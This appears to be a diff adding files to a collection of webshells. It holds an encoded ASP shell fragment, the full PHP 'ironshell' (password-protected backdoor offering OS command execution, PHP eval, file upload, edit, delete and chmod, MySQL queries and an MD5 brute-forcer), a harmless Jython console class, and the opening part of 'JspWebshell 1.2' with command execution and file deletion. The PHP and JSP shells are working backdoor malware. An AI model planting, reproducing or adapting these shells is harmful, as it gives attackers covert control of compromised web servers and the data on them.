4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ýdhý l~Ý/~b9lhýU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n P4b~l^YP9r"k NPGV[;ð!Prçk ~RczhC4:EO&bx[+X 4Yh,XmyýXKD!"P(E.Nm3r~bxNaR4Y:,C[lsýx,/rYndbx[+0rPbx[nXB+~LöM+~NðrþbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;þ!xCP~CkYýðýhý.NmPb9ls~Ýx9+ak,XnhbþPr^;XKDR@!sr@*~E,kþs+h[P@!0KUY,mGsKD'2r 3@*r0;@!zWKxD@*P0ý/sý~AKþPFl^l^C0R@!^r@*zDYý0~ul^l,bUVChmNýz/mUýy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk P&PsW[smDýx9Cx,XlM[ýhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n Y+M@*A!P/1.rwDPt+4Nr~:l.l6ýUNmx~jcKP)[ý l~5m"ý^:ýþOýMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDýUPPühü NnPÇmsýþýDcR@!8M@*b[./~?mOýMýPFýk:ý lPnW9;x!P!öDü Yüsns+3,ÝdYNkðbUry,fK/zlUýU,b[ýxý,zl.ýx @!4D@*P6OlMnmP$ö^ü:ü,2ð+MP~Gþ/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C ýx~fKdXmVC.ý ýPMö.üUDüVnX8bVh3,Ýçkx,bHUýPU+.\D[n,rVsCxý.PSm"ýhP_N9Pol.VYh+. R,@!8.@*bN.nkPFý/sýUmPPm:,.+Mk,!kMkskMPcö. )P9l-S+4'Csk1l -[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk ^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lþhm@!(D@*zNsrx,ÞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ðn.^+Dr~ÇmVCDmV,SGTk Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l VmDýUýPÝU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
</table>
<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
<%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>

588
138shell/I/ironshell.txt Normal file
View file

@ -0,0 +1,588 @@
<?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}
$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
font-size: 12px;
font-family: verdana;
color: #33FF00;
background: #000000;
}
#d {
background: #003000;
}
#f {
background: #003300;
}
#s {
background: #006300;
}
#d:hover
{
background: #003300;
}
#f:hover
{
background: #003000;
}
pre {
font-size: 10px;
font-family: verdana;
color: #33FF00;
}
a:hover {
text-decoration: none;
}
input,textarea,select {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #33FF00;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #33FF00;
color: #33FF00;
border-top-color: #33FF00;
font-family: verdana;
border-right-width: 1px;
border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
//
//Page handling
//
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {
case 'cmd': //Run command
print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
if(isset($_REQUEST['command']))
{
print "<pre>";
execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
}
break;
case 'edit': //Edit a fie
if(isset($_POST['editform']))
{
$f = $_GET['file'];
$fh = fopen($f, 'w') or print "Error while opening file!";
fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
fclose($fh);
}
print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
if(file_exists($_GET['file']))
{
$rd = file($_GET['file']);
foreach($rd as $l)
{
print htmlspecialchars($l);
}
}
print "</textarea><input type=submit value=\"Save\"></form>";
break;
case 'delete': //Delete a file
if(isset($_POST['yes']))
{
if(unlink($_GET['file']))
{
print "File deleted successfully.";
}
else
{
print "Couldn't delete file.";
}
}
if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
{
print "Are you sure you want to delete ".$_GET['file']."?<br>
<form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
<input type=hidden name=yes value=yes>
<input type=submit value=\"Delete\">
";
}
break;
case 'eval': //Evaluate PHP code
print "<form action=\"".$me."?p=eval\" method=POST>
<textarea cols=60 rows=10 name=\"eval\">";
if(isset($_POST['eval']))
{
print htmlspecialchars($_POST['eval']);
}
else
{
print "print \"Yo Momma\";";
}
print "</textarea><br>
<input type=submit value=\"Eval\">
</form>";
if(isset($_POST['eval']))
{
print "<h1>Output:</h1>";
print "<br>";
eval($_POST['eval']);
}
break;
case 'chmod': //Chmod file
print "<h1>Under construction!</h1>";
if(isset($_POST['chmod']))
{
switch ($_POST['chvalue']){
case 777:
chmod($_POST['chmod'],0777);
break;
case 644:
chmod($_POST['chmod'],0644);
break;
case 755:
chmod($_POST['chmod'],0755);
break;
}
print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
}
if(isset($_GET['file']))
{
$content = urldecode($_GET['file']);
}
else
{
$content = "file/path/please";
}
print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
<input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
<select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";
break;
case 'mysql': //MySQL Query
if(isset($_POST['host']))
{
$link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
mysql_select_db($_POST['dbase']);
$sql = $_POST['query'];
$result = mysql_query($sql);
}
else
{
print "
This only queries the database, doesn't return data!<br>
<form action=\"".$me."?p=mysql\" method=POST>
<b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
<b>Username:<br><input type=text name=username value=\"root\" size=10><br>
<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
<b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
<b>Query:<br></b<textarea name=query></textarea>
<input type=submit value=\"Query database\">
</form>
";
}
break;
case 'createdir':
if(mkdir($_GET['crdir']))
{
print 'Directory created successfully.';
}
else
{
print 'Couldn\'t create directory';
}
break;
case 'phpinfo': //PHP Info
phpinfo();
break;
case 'rename':
if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}
}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file']));
}
else
{
$file = "";
}
print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;
case 'md5':
if(isset($_POST['md5']))
{
if(!is_numeric($_POST['timelimit']))
{
$_POST['timelimit'] = 30;
}
set_time_limit($_POST['timelimit']);
if(strlen($_POST['md5']) == 32)
{
if($_POST['chars'] == "9999")
{
$i = 0;
while($_POST['md5'] != md5($i) && $i != 100000)
{
$i++;
}
}
else
{
for($i = "a"; $i != "zzzzz"; $i++)
{
if(md5($i == $_POST['md5']))
{
break;
}
}
}
if(md5($i) == $_POST['md5'])
{
print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
}
}
}
print "Will bruteforce the md5
<form action=\"".$me."?p=md5\" method=POST>
<b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
<b>Characters:</b><br><select name=\"chars\">
<option value=\"az\">a - zzzzz</option>
<option value=\"9999\">1 - 9999999</option>
</select>
<b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
<input type=submit value=\"Bruteforce md5\">
</form><br>*: if set_time_limit is allowed by php.ini";
break;
case 'headers':
foreach(getallheaders() as $header => $value)
{
print htmlspecialchars($header . ":" . $value)."<br>";
}
break;
}
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
$files = array();
$directories = array();
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}
print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.'))
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}
print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";
}
function login()
{
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
<form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
</form>";
}
function reload()
{
header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
}
function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}
$i = 0;
$total = "";
foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i)
{
$pre .= $dirparts[$p]."/";
$p++;
}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}
return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

125
138shell/J/Java Shell.js.txt Normal file
View file

@ -0,0 +1,125 @@
package enigma.shells.jython;
import java.io.*;
import java.awt.*;
import javax.swing.*;
import enigma.console.*;
import enigma.console.java2d.*;
import org.python.core.*;
import org.python.util.*;
public class JythonShell extends JPanel implements Runnable {
public static int DEFAULT_ROWS = 20;
public static int DEFAULT_COLUMNS = 80;
public static int DEFAULT_SCROLLBACK = 100;
public PrintStream out;
public Console console;
public Java2DTextWindow text;
public JScrollPane scrollPane;
public PythonInterpreter interp;
private Color colorBackground = new Color(0, 0, 0);
private Color colorForeground = new Color(187, 187, 187);
private Color colorError = new Color(187, 0, 0);
private Color colorCursor = new Color(187, 187, 0);
public JythonShell() {
this(null, Py.getSystemState());
}
public JythonShell(PyObject dict) {
this(dict, Py.getSystemState());
}
public JythonShell(int columns, int rows, int scrollback) {
this(null, Py.getSystemState(), columns, rows, scrollback);
}
public JythonShell(PyObject dict, PySystemState systemState) {
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
}
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
super(new BorderLayout());
text = new Java2DTextWindow(columns, rows, scrollback);
text.setBackground(colorBackground);
scrollPane = new JScrollPane();
scrollPane.setViewportView(text);
add(scrollPane, BorderLayout.CENTER);
console = new DefaultConsoleImpl(text);
out = console.getOutputStream();
interp = new PythonInterpreter(dict, systemState);
interp.setOut(out);
interp.setErr(out);
}
public void run() {
int pos = 0;
int tbs = 4;
String line = "";
String command = "";
for (;;) {
String space = "";
for (int i = 0; i < pos * tbs; i++) {
space += " ";
}
try {
console.setTextAttributes(new TextAttributes(colorCursor));
if (pos > 0) {
out.print(space + "... ");
} else {
out.print(">> ");
}
console.setTextAttributes(new TextAttributes(colorForeground));
line = console.readLine().trim();
if (line.length() == 0 && pos > 0) {
pos--;
} else if (line.endsWith(":")) {
command += space + line + "\n";
pos++;
} else {
command += space + line + "\n";
}
if (pos == 0) {
interp.exec(command);
command = "";
}
} catch (Exception e) {
console.setTextAttributes(new TextAttributes(colorError));
e.printStackTrace();
command = "";
}
}
}
public static void main(String[] argv) {
PySystemState.initialize(System.getProperties(), null, argv);
JFrame frame = new JFrame("Jython Console");
JythonShell console = new JythonShell();
frame.add(console, BorderLayout.CENTER);
frame.pack();
frame.setVisible(true);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
console.run();
}
}

788
138shell/J/JspWebshell 1.2.txt Normal file
View file

@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp网站管理</p>
*
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:本程序是小弟处于兴趣所写如有疑问请联系QQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
%>
<%!
String _password ="111";//密码
public String readAllFile(String filePathName) throws IOException
{
FileReader fr = new FileReader(filePathName);
int count = fr.read();
String res="";
while(count != -1)
{
//System.out.print((char)count);
res=res+(char)count;
count = fr.read();
if(count == 13)
{
fr.skip(1);
}
}
fr.close();
return res;
}
public void writeFile(String filePathName,String args) throws IOException
{
FileWriter fw = new FileWriter(filePathName);
PrintWriter out=new PrintWriter(fw);
out.write(args);
out.println();
out.flush();
fw.close();
out.close();
}
public boolean createFile(String filePathName) throws IOException
{
boolean result = false;
File file = new File(filePathName);
if(file.exists())
{
System.out.println("文件已经存在!");
}
else
{
file.createNewFile();
result = true;
System.out.println("文件已经创建!");
}
return result;
}
public boolean createFolder(String fileFolderName)
{
boolean result = false;
try
{
File file = new File(fileFolderName);
if(file.exists())
{
//file.delete();
System.out.println("目录已经存在!");
result = true;
}
else
{
file.mkdir();
System.out.println("目录已经建立!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean DeleteFolder(String filefolderName)
{
boolean result = false;
try
{
File file = new File(filefolderName);
if(file.exists())
{
file.delete();
System.out.println("目录已删除!");
result = true;
}
}
catch(Exception ex)
{
result = false;
System.out.println("CreateAndDeleteFolder is error:"+ex);
}
return result;
}
public boolean validate(String password) {
if (password.equals(_password)) {
return true;
} else {
return false;
}
}
public String HTMLEncode(String str) {
str = str.replaceAll(" ", "&nbsp;");
str = str.replaceAll("<", "&lt;");
str = str.replaceAll(">", "&gt;");
str = str.replaceAll("\r\n", "<br>");
return str;
}
public String exeCmd(String cmd) {
Runtime runtime = Runtime.getRuntime();
Process proc = null;
String retStr = "";
InputStreamReader insReader = null;
char[] tmpBuffer = new char[1024];
int nRet = 0;
try {
proc = runtime.exec(cmd);
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
retStr += new String(tmpBuffer, 0, nRet);
}
insReader.close();
retStr = HTMLEncode(retStr);
} catch (Exception e) {
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
} finally {
return retStr;
}
}
public boolean fileCopy(String srcPath, String dstPath) {
boolean bRet = true;
try {
FileInputStream in = new FileInputStream(new File(srcPath));
FileOutputStream out = new FileOutputStream(new File(dstPath));
byte[] buffer = new byte[1024];
int nBytes;
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
out.write(buffer, 0, nBytes);
}
in.close();
out.close();
} catch (IOException e) {
bRet = false;
}
return bRet;
}
class EnvServlet
{
public long timeUse=0;
public Hashtable htParam=new Hashtable();
private Hashtable htShowMsg=new Hashtable();
public void setHashtable()
{
Properties me=System.getProperties();
Enumeration em=me.propertyNames();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=me.getProperty(strKey);
htParam.put(strKey,strValue);
}
}
public void getHashtable(String strQuery)
{
Enumeration em=htParam.keys();
while(em.hasMoreElements())
{
String strKey=(String)em.nextElement();
String strValue=new String();
if(strKey.indexOf(strQuery,0)>=0)
{
strValue=(String)htParam.get(strKey);
htShowMsg.put(strKey,strValue);
}
}
}
public String queryHashtable(String strKey)
{
strKey=(String)htParam.get(strKey);
return strKey;
}
/* public long test_int()
{
long timeStart = System.currentTimeMillis();
int i=0;
while(i<3000000)i++;
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}
public long test_sqrt()
{
long timeStart = System.currentTimeMillis();
int i=0;
double db=(double)new Random().nextInt(1000);
while(i<200000){db=Math.sqrt(db);i++;}
long timeEnd = System.currentTimeMillis();
long timeUse=timeEnd-timeStart;
return timeUse;
}*/
}
%>
<%
EnvServlet env=new EnvServlet();
env.setHashtable();
//String action=new String(" ");
//String act=new String("action");
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>JspWebShell By 绝对零度</title>
<style>
body {
font-size: 12px;
font-family: "宋体";
background-color: #666666;
}
A {
COLOR: black; TEXT-DECORATION: none
}
A:hover {
COLOR: black; TEXT-DECORATION: underline; none:
}
td {
font-size: 12px;
font-family: "宋体";
color: #000000;
}
input.textbox {
border: black solid 1;
font-size: 12px;
height: 18px;
}
input.button {
font-size: 12px;
font-family: "宋体";
border: black solid 1;
}
td.datarows {
font-size: 12px;
font-family: "宋体";
height: 25px;
color: #000000;
}
.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
textarea {
border: black solid 1;
}
.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
.table1 {BORDER:gray 0px ridge;}
.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
.tr1 {BACKGROUND-color:gray }
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
</head>
<body bgcolor="#666666">
<%
//session.setMaxInactiveInterval(_sessionOutTime * 60);
String password=request.getParameter("password");
if (password == null && session.getAttribute("password") == null) {
%>
<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px">
<TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
<tr>
<td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
<tr>
<TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell
version 1.2管理登录 :::...</b></font></TD>
<TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By
绝对零度</FONT></TD>
</tr>
<form name="bctform" method="post">
<tr bgcolor="#999999">
<td height="30" colspan="2" align="center" class="td2">
<input name="password" type="password" class="textbox" id="Textbox" />
<input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" />
</td>
</tr>
</form>
</TABLE></td>
</tr>
</TABLE>
</div>
<%
} else {
if (session.getAttribute("password") == null) {
if (validate(password) == false) {
out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
out.close();
return;
}
session.setAttribute("password", password);
} else {
password = (String)session.getAttribute("password");
}
%>
<%
File tmpFile = null;
String delfile="";
String delfile1="";
String editpath="";
delfile1=request.getParameter("delfile");
editpath=request.getParameter("filepath");
if (delfile1!=null)
{delfile=new String(delfile1.getBytes("ISO8859_1"));
}
if ( delfile1!= null) {
// out.print(delfile);
tmpFile = new File(delfile);
if (! tmpFile.delete()) {
out.print( "<font color=\"red\">删除失败</font><br>\n");
}
}
%>
<%String editfilecontent=null;
String editfilecontent1=request.getParameter("content");
// out.println(editfilecontent1);
//String save=request.getParameter("save");
if (editfilecontent1!=null)
{editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
// out.print(editfile);
//out.print(editfilecontent);
if (editfile!=null&editfilecontent!=null)
{try {writeFile(editfile,editfilecontent);}
catch (Exception e) {out.print("写入失败");}
out.print("写入成功");
}
%>
<%request.setCharacterEncoding("GBK");%>
<%//String editfile=request.getParameter("editfile");
//out.print(editfile);
if (request.getParameter("jsptz")!=null)
{%>
<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2">
<CENTER>
<table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#999999" height="22">
<td width="130" bgcolor="#999999">&nbsp;服务器名</td>
<td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%>
<%=env.queryHashtable("sun.os.patch.level")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器操作系统类型</td>
<td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
<td>&nbsp;服务器操作系统模式</td>
<td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器所在地区</td>
<td>&nbsp;<%=env.queryHashtable("user.country")%></td>
<td>&nbsp;服务器语言</td>
<td>&nbsp;<%=env.queryHashtable("user.language")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器时区</td>
<td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
<td>&nbsp;服务器时间</td>
<td>&nbsp;<%=new java.util.Date()%> </td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;服务器解译引擎</td>
<td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
<td width="130">&nbsp;服务器端口</td>
<td width="170">&nbsp;<%= request.getServerPort() %></td>
</tr>
<tr bgcolor="#999999" height="22">
<td height="22">&nbsp;当前用户</td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;用户目录</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;本文件实际路径</td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
